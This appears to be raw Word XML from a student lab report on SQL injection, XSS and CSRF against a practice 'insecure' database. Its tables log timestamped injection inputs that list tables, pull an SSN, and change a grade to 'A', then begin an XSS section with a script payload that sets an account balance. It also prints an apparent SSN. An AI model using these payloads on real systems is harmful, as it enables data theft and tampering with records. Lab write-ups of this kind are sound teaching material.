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C417" w14:textId="35EEB961" w:rsidR="00730769" w:rsidRDefault="00B1285E" w:rsidP="00B1285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Kim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224A9A8D" w14:textId="406FE443" w:rsidR="00B1285E" w:rsidRDefault="00B1285E" w:rsidP="00B1285E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SQL, XSS, &amp; CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420F1741" w14:textId="3A716305" w:rsidR="00F14B6B" w:rsidRDefault="00B1285E" w:rsidP="00365D9E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Injection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2230"/>
        <w:gridCol w:w="4037"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F6FCC" w14:paraId="03B20965" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A6049E" w14:textId="33BA655A" w:rsidR="000F6FCC" w:rsidRDefault="000F6FCC" w:rsidP="000F6FC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USERID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0C0F3D" w14:textId="2F2481A0" w:rsidR="000F6FCC" w:rsidRDefault="000F6FCC" w:rsidP="000F6FC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MODIFICATIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52B1A273" w14:textId="23B39252" w:rsidR="000F6FCC" w:rsidRDefault="000F6FCC" w:rsidP="000F6FC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STAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB2EC5" w14:paraId="5357D638" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B96AA89" w14:textId="2FE7E3C1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show tables;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E195236" w14:textId="4BE99BF6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0C73D8FB" w14:textId="63FB581B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23:00:00 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB2EC5" w14:paraId="30D4EF49" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A0DC40" w14:textId="76D8EAB8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‘ ;select</w:t>
            </w:r>
            <w:proofErr w:type="gram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* from Database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=tkj9ep;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D2E4B08" w14:textId="51C04382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34014C32" w14:textId="19151802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23:02:00 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB2EC5" w14:paraId="507692C3" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3642B642" w14:textId="17F3A394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show * from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2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3856CE41" w14:textId="4DA3BE5C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75336A01" w14:textId="48EADE37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23:05:59 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="794BF9EF" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="151D57B3" w14:textId="19EA110F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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21BA1810" w14:textId="181D7F32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7B39F3D4" w14:textId="25F0DD7C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23:07:31 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="3259F15D" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010F1D28" w14:textId="773AED8D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='tkj9ep';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BDE402D" w14:textId="4DA4DA20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5850E47A" w14:textId="32E0B431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23:09:36 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="60CF2131" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="723046E5" w14:textId="77EE0C65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2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="411CAE29" w14:textId="63C2F2B9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04523530" w14:textId="112F8FF1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23:14:07 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="664D0C28" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177E9EAE" w14:textId="4F936DC7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2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F9A41F7" w14:textId="6355E34F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0BE188E2" w14:textId="5C07AE44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23:14:46 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="6CA47CEF" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D6BF23F" w14:textId="6C51EC28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use Database;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71392F54" w14:textId="14E8648B" w:rsidR="000411EE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39D99E8E" w14:textId="767C214E" w:rsidR="000411EE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23:17:24 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000411EE" w14:paraId="403F630B" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B8F46A" w14:textId="4BAC6647" w:rsidR="000411EE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describe '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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10857149" w14:textId="1EB1BB43" w:rsidR="000411EE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6A57AAC6" w14:textId="481630EF" w:rsidR="000411EE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23:18:47 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0EF3" w14:paraId="2054F3DE" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D162D41" w14:textId="16D847F2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use Database;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D2DEB2" w14:textId="08A57B4C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02B62277" w14:textId="09C249AA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23:19:28 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0EF3" w14:paraId="207EB4BE" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE6281A" w14:textId="7FFA630A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='tkj9ep';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149D2F9C" w14:textId="22213E5A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6D38360E" w14:textId="650CB383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23:21:22 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0EF3" w14:paraId="616EDB27" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB19D98" w14:textId="41127FFC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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF7B141" w14:textId="290015C6" w:rsidR="00AF0EF3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2B57C6B5" w14:textId="7EA3D1DD" w:rsidR="00AF0EF3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23:27:45 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="022A3E51" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42EEAE97" w14:textId="17134DA4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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59ACA335" w14:textId="77CDAF39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4EFE059D" w14:textId="79617632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23:28:42 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="69860AF2" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172BCD51" w14:textId="4F992873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Database.Tables_in_insecure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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06704CAF" w14:textId="03DFB39E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1D3A8827" w14:textId="3B1B63C6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23:29:47 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="60EA4E12" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="145CA06C" w14:textId="085AC3C5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; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40830ABA" w14:textId="6F26EA62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None </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3F63F3" w14:textId="413C5690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23:31:02 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="482C80AB" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="415F09E0" w14:textId="0A06F9D8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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760AAB39" w14:textId="40BBB15D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1257AA49" w14:textId="492240F1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23:35:20 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="1E0593F7" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54DDD98A" w14:textId="3CEA69C2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--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEF744B" w14:textId="0533D487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464D4965" w14:textId="6195035F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23:35:53 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81349" w14:paraId="577AB09A" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617B513B" w14:textId="1AA04B65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; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E83EA4" w14:textId="77777777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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B7FD3C" w14:textId="6C682958" w:rsidR="00E8134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23:37:57 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="1BE79870" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF46C28" w14:textId="0A39D354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‘; show tables -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E5FBB7" w14:textId="036F4032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7CF69CBA" w14:textId="3D2D79FA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23:41:14 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="013BB844" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25563416" w14:textId="6692470F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‘; show tables --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7718FED0" w14:textId="23A09069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14F47511" w14:textId="26FBEE91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23:42:35 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="158A97D8" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E646796" w14:textId="400FA79C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‘; describe data -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE6D25C" w14:textId="5E429CED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3E2110B4" w14:textId="1FE9B3A8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23:43:11 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA15D9" w14:paraId="2A56A34C" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC9EA4D" w14:textId="40ACD308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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2E65BD" w14:textId="56E3EB31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5201CE5D" w14:textId="35109A14" w:rsidR="00AA15D9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23:48:00 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="6987F99A" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1D6248" w14:textId="454E9B3B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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B503C46" w14:textId="30948320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40251449" w14:textId="69208689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23:49:06 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="100430F7" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53A5B98B" w14:textId="5683DF62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='tkj9ep'; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17CBE3A3" w14:textId="416EE4B4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03E8AB67" w14:textId="51C786AC" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="00332CE7">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/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23:50:03 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="4061DB02" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="768FF852" w14:textId="07F87582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='tkj9ep'; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C366525" w14:textId="4ABC1D99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1DD2F085" w14:textId="266D0FBE" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7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23:50:22 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="4BB20380" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA0F7FF" w14:textId="25FFAECC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‘; describe data --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7956C627" w14:textId="5328166A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10FCC22D" w14:textId="18AD9F54" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7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23:51:39 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="1B1C82D5" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35941927" w14:textId="3D031BBC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describe data; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D95BB19" w14:textId="77777777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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44375DF6" w14:textId="62981AF1" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7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23:52:50 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="13DA26BF" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC363F6" w14:textId="73F22D3E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describe data --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41DEC330" w14:textId="2DA13B40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19F2D4CB" w14:textId="1DABABD3" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7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23:53:23 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="14B6615F" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F40A688" w14:textId="77777777" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="007116F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describe data --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E41A6B1" w14:textId="77777777" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="007116F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47A4B4BC" w14:textId="2B817C25" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7" w:rsidP="007116F0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23:54:10 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="3C172704" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29AAF36E" w14:textId="4198157D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grade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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E497A69" w14:textId="51D62184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03E9D182" w14:textId="63C8C00D" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00332CE7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23:56:26 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00332CE7" w14:paraId="3C0927B1" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4926A56F" w14:textId="0DD35D2A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ssn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='tkj9ep' -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA58284" w14:textId="63E1D8E3" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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6A8CF112" w14:textId="3F78131A" w:rsidR="00332CE7" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E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23:57:51 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00365D9E" w14:paraId="40F86779" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F53923D" w14:textId="2C22ECDF" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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update data set grade='A'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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="041E0E72" w14:textId="5B8F95D6" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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Changed grade entry for tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="101CEE8E" w14:textId="0561A8E3" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E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Sun, 26 Mar 2023 00:01:28 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00365D9E" w14:paraId="753C5ABE" w14:textId="77777777" w:rsidTr="00365D9E">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02DEF458" w14:textId="27721C2B" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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grade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 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2099" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E508892" w14:textId="0A7D764A" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9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32941026" w14:textId="18405A21" w:rsidR="00365D9E" w:rsidRPr="00365D9E" w:rsidRDefault="00365D9E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Sun, 26 Mar 2023 00:01:50 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="022EED40" w14:textId="55FC71BE" w:rsidR="000F6FCC" w:rsidRDefault="00AA15D9" w:rsidP="00AA15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Information: SSN</w:t>
      </w:r>
      <w:r w:rsidR="00332CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00365D9E" w:rsidRPr="00365D9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(109201914)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C414A0A" w14:textId="6F303F58" w:rsidR="00B11099" w:rsidRDefault="00B11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FB1472" w14:textId="6128B6AE" w:rsidR="00AA15D9" w:rsidRDefault="00B11099" w:rsidP="00B1109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XSS Scripting Attack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913622" w14:paraId="228C93B8" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAD0EEA" w14:textId="73F5EA85" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="00913622" w:rsidP="009136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USERID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C221500" w14:textId="6BCDB30D" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="00913622" w:rsidP="009136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TIME STAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00913622" w14:paraId="229A6063" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABDEDB8" w14:textId="52BD8F8B" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="003420DE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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2355834A" w14:textId="06212021" w:rsidR="00913622" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="00913622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14:53:45 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003420DE" w14:paraId="403F79B1" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1021EECF" w14:textId="36D798C1" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="003420DE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&lt;script&gt;\</w:t>
            </w:r>
            <w:proofErr w:type="spell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nbalance</w:t>
            </w:r>
            <w:proofErr w:type="spell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1000000;\</w:t>
            </w:r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n&lt;\script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D32BAF" w14:textId="50A0C8AB" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="00913622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14:55:46 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003420DE" w14:paraId="6A3FB97F" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04700013" w14:textId="25401D83" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="003420DE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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57BF8AE1" w14:textId="6CF1E606" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="00913622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14:56:03 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276DBA" w14:paraId="6F124B35" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
